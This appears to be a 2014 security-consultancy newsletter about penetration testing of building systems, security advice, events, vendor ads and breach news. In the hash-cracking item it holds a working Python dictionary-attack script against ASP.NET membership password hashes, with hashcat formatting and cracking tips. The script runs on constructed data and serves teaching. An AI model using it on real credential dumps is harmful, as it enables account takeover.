
Testing New Technologies – Smoke Detection, Alarms, CCTV etc.

In the last couple of years, we’ve been called upon to test a wide range of new technologies that software (and hardware) product vendors are developing and our clients are implementing.

All of these systems are forming part of an organisation’s critical infrastructure - IP based management and monitoring systems; smoke detection systems, alarm systems, CCTV systems, to name a few.

In our experience, not one of them has passed with a clean bill of health after our security testing, and almost all of the vendors have later had to work with the Securus Global team to fix the bugs in their software.

If you are implementing or have implemented such systems, make sure you are testing them in line with the rest of your testing program, and make sure you are engaging experienced and capable testers to do so. These are not point-and-click exercises with tools.

The last thing you want is for your systems to be compromised and someone to be able to set off your smoke detectors, turn your alarms off and on, control your CCTV and in an extreme scenario, (and we did this), be able to open doors at will at your branch locations.

As with any new technology you buy, speak with the developers or vendors and ask them how they security test their product; get proof that they do it, and don’t implement until you are confident of what you are being told and, to a good degree of certainty, confident in the system itself. Even then, the small investment in testing it yourself, with Securus Global or another vendor of your choice, may save you a lot of future pain. We have seen many cases where a technology was simply not mature enough, and we’ve saved our clients not only from a security perspective but potentially millions of dollars of investment in poor technology.

Contact us if you would like to discuss your situation.

Cracking .NET Membership Password Hashes

There are times when our penetration testing work can seem like a lot of stabbing in the dark with a bit of black magic thrown into the mix for good measure. To help dispel these myths, we've recently written up the background to some of our more interesting findings, both to explain what we do and to show how you can play along at home.

Following on from his recent post on Dumping Windows Credentials, Sebastien Macke has provided some insight into how we go about cracking password hashes when we get access to them.

Read on at: https://www.securusglobal.com/community/2014/02/25/cracking-net-membership-password-hashes/
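As an added worked example (not code from the Securus Global post, nor from Microsoft's provider), the Python below recomputes ASP.NET SqlMembershipProvider password hashes and runs a small dictionary attack against a constructed dump of aspnet_Membership rows. It assumes the provider's SHA1 construction for PasswordFormat=Hashed (salt bytes prepended to the UTF-16LE password, result Base64-encoded); the salts, usernames, passwords and wordlist are all made up for the example.

```python
import base64
import hashlib

# Constructed 16-byte salts, Base64-encoded the way SqlMembershipProvider stores
# them in aspnet_Membership.PasswordSalt. Hypothetical values for this example.
SALT_A = "AAECAwQFBgcICQoLDA0ODw=="
SALT_B = "ECRgTkR+sLyVaM1WaalKfA=="

# Constructed wordlist; a real attack would use a large dictionary plus rules.
WORDLIST = ["123456", "password", "letmein", "Summer2014!", "Welcome1"]


def membership_hash(password: str, salt_b64: str, algorithm: str = "sha1") -> str:
    """Recompute the Base64 hash SqlMembershipProvider stores for a password.

    Construction (PasswordFormat=Hashed, non-keyed algorithm such as SHA1):
        hash = Base64( H( salt_bytes || UTF16LE(password) ) )
    The provider uses Encoding.Unicode, i.e. UTF-16LE without a BOM, so
    hashing the ASCII bytes of the password gives a different, wrong digest.
    """
    salt = base64.b64decode(salt_b64)
    data = salt + password.encode("utf-16-le")
    digest = hashlib.new(algorithm, data).digest()
    return base64.b64encode(digest).decode("ascii")


def sample_dump() -> list:
    """Constructed rows as they would come out of aspnet_Membership:
    (UserName, Password, PasswordSalt). The hashes are generated here so the
    example is self-contained; in an engagement they come from the database."""
    return [
        ("alice", membership_hash("Summer2014!", SALT_A), SALT_A),
        ("bob", membership_hash("letmein", SALT_B), SALT_B),
        # A passphrase that is not in WORDLIST, so it should survive the attack.
        ("carol", membership_hash("correct horse battery staple", SALT_A), SALT_A),
    ]


def crack_dump(rows, wordlist, algorithm: str = "sha1") -> dict:
    """Dictionary attack: try every candidate against every row.

    Each row carries its own salt, so there is no shortcut across users: the
    work is (rows x candidates) hashes. A single fast SHA1 with no iteration
    count is what makes this format cheap to attack offline."""
    found = {}
    for username, stored_hash, salt_b64 in rows:
        for candidate in wordlist:
            if membership_hash(candidate, salt_b64, algorithm) == stored_hash:
                found[username] = candidate
                break
    return found


def to_hashcat_141(stored_hash: str, salt_b64: str) -> str:
    """Format a row for hashcat mode 141 (EPiServer 6.x < .NET 4), whose
    construction is the same salt-prefixed SHA1 over UTF-16LE. The line format
    follows hashcat's documented example hashes; verify it against your
    hashcat version before relying on it."""
    return f"$episerver$*0*{salt_b64}*{stored_hash}"


if __name__ == "__main__":
    rows = sample_dump()
    for user, h, s in rows:
        print(user, to_hashcat_141(h, s))
    print(crack_dump(rows, WORDLIST))  # {'alice': 'Summer2014!', 'bob': 'letmein'}
```

Two checks before spending GPU time on a dump like this: confirm the UTF-16LE encoding by recomputing the hash of a known test account (an ASCII-encoded guess will never match, and it is the most common reason a "correct" wordlist cracks nothing), and confirm the configured hashAlgorithmType in web.config or machine.config. On .NET 4 the default is HMACSHA256, a keyed algorithm for which the provider uses the salt as the HMAC key rather than prepending it, so the construction above will not match those hashes.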

The “most asked question” – What should companies do to minimise their security risks?

This is the question our CEO, Drazen Drazic receives the most when being interviewed by the press or when sitting with boards and CEOs. We asked Drazen to go through how he answers this question:

I haven’t changed my thoughts on how I answer this in my whole time in this industry. I say: same as 10 years ago, same as 20 years ago. Get your basics right from the outset before you look to software and other tools to do it for you. They [tools] won’t do the job for you unless you have the fundamentals in place. Sort out your systems, processes, assets and people in regards to security before you put any reliance on security tools.

Develop a framework for how you think about and approach your security risk management program. We’ve always used our own framework, which we developed about 15 years ago, called the SSMF – Strategic Security Management Framework. In brief, it covers the following categories, with the success of each dependent upon the successful deployment of each of the previous layers:

1. Management and Governance: If the CEO and Senior Officers of the business do not ultimately own the responsibility and accountability for the security of the business, then it just does not get the appropriate attention and support throughout the business. This is the number one key point!

Read the full article here: https://www.securusglobal.com/community/2014/02/27/the-7-reasons-why-businesses-are-insecure/

Upcoming Events - Breakfast Brief

Hacking Mobile Applications - Industry Case Studies.

Presenter: Michael Gianarakis (Senior Security Consultant)
When: Tuesday 1st April, 8am breakfast, followed by presentation.
Location: Securus Global's Melbourne Office - Level 8, 50 Queen St.

Synopsis:
The significant growth in mobile commerce, driven by the mass adoption and rapid innovation of mobile platforms, has put a bullseye on these systems for people who see a different kind of opportunity in their introduction.

While the growth of mobile commerce has presented many opportunities for online retailers to expand their business and improve customer engagement, it's also created a lucrative target for hackers. We know. We see it every day in our line of business.

This session will give you an insight into what can go wrong and how it has gone wrong for some companies, drawing on our experience examining the security of mobile applications and assisting clients from a variety of sectors, from major financial institutions and retailers through to media companies whose businesses depend on the security of their data.

Contact us to reserve your place: info@securusglobal.com

Would be great to see you there!

Mitigate DDoS Attacks with Cloud & On-Premise DDoS Protection

No organization is safe from the threat of Distributed Denial of Service (DDoS) attacks. Cyber criminals, hacktivists and nation states have targeted companies in virtually every industry in recent years. These DDoS attacks are financially devastating, costing organizations on average $27 million for a 24-hour website outage. In 2013, DDoS attacks averaged 2.7 Gbps, with many attacks exceeding 50 Gbps of throughput. DDoS attacks are more devastating than ever.

Imperva delivers a hybrid on-premise and cloud solution to stop both sophisticated application-layer attacks and multi-gigabit network DDoS attacks.

Key Capabilities:

  • Stop large-scale network DDoS attacks before they reach your network
  • Avoid application outages and brand damage
  • Protect in minutes with effortless deployment
  • Leverage real-time 24x7 assistance from Imperva's DDoS security experts
  • Lower costs by eliminating need to over-provision bandwidth

5 Critical Steps of a Complete Security Risk & Compliance Lifecycle

Security and compliance remain at the forefront of concerns facing security leaders today. Tackling the challenge of finding and addressing risks in the enterprise while demonstrating compliance with increasingly demanding regulations requires the maturity and discipline to adopt and follow a complete security risk and compliance lifecycle.

Tripwire worked with clients to capture and distill the five critical steps that successful organizations take to reduce risk, demonstrate compliance and answer the most important questions in today’s compliance-driven enterprise:

  • How secure and compliant is our network?
  • Which top issues must we address today to improve security and achieve compliance?
  • Who is accountable and how are they doing?

What makes good application security knowledge?

The story of the Target security breach has continued to unfold. Had it not been for patterns of card fraud identified by others, and not by Target, they would probably still be oblivious to the fact that they had been compromised, and had been for some time.
http://www.nytimes.com/2014/01/18/business/a-sneaky-path-into-target-customers-wallets.html?ref=business&_r=1

We could tell you that penetration testing could potentially have negated this risk to the company, and it may well have, but the truth is that a company’s security position is rarely, if ever, substantially improved by regular penetration testing alone.

Read this article by Drazen Drazic from 2010 that looks deeper into Application and Systems security:
http://tek-tips.nethawk.net/looking-at-what-makes-good-application-security-knowledge/

New Securus Global Social Engineering Services

In our last newsletter, we posted a case study on “spear-phishing” and the ease with which such attacks, if planned out well, can succeed:
https://www.securusglobal.com/community/2013/12/05/does-spear-phishing-work/

Whilst many companies carry out technical penetration and other security tests, it's interesting to see how few are actually addressing the concerns of “social engineering” based attacks.

We believe that there are numerous reasons for this, ranging from the belief that there is nothing that can be done to stop such attacks from occurring, through to companies simply not being aware of just how prevalent such attacks are, or not wanting to “hack humans”.

As we’ve said before, if someone wants to target your organisation, they will generally focus on the path of least resistance. In a lot of cases, that doesn’t involve looking for vulnerabilities in your information systems (traditional “hacking”) at all, when a couple of phone calls or other carefully crafted social engineering attacks can achieve the desired result faster and with less chance of detection.

Securus Global has been helping clients minimise their security risks against social engineering attacks now for many years and in 2014, we’ve expanded our services in this field to a level we believe no one else is doing at the moment.

Our Red Cell services continue to evolve; however, the more interesting developments are our new self-service offerings, which allow our clients to create their own testing programs at their own pace, with their own customisation, analysis and tracking. Read more about this here: https://www.securusglobal.com/services/assessment-and-assurance-services/red-cell-assessments/

For further information, please contact us.

Industry Round-up

Tokyo MtGox Bitcoin exchange files for bankruptcy:

The troubled MtGox Bitcoin exchange has filed for bankruptcy protection in Japan, with its chief executive saying it had lost nearly half a billion dollars worth of the digital currency in a possible theft.

Mark Karpeles, who has not been seen in public for several days, re-emerged to tell a press conference that his firm’s digital vaults had been almost completely emptied.

“We have lost Bitcoins due to weaknesses in the system,’’ French-born Karpeles said in Japanese.

Karpeles said MtGox had liabilities of 6.5 billion yen ($71 million) and that around a million users had been affected when hackers broke into the exchange in early February.

Read more: http://mobile.news.com.au/finance/tokyo-mtgox-bitcoin-exchange-files-for-bankruptcy/story-e6frfm1i-1226841536953

Securus Global - Community

Connect, follow or like us on social media: LinkedIn / Twitter / Facebook

And make sure to check out our team blog and the other industry news that we publish regularly on our website here: https://www.securusglobal.com/community/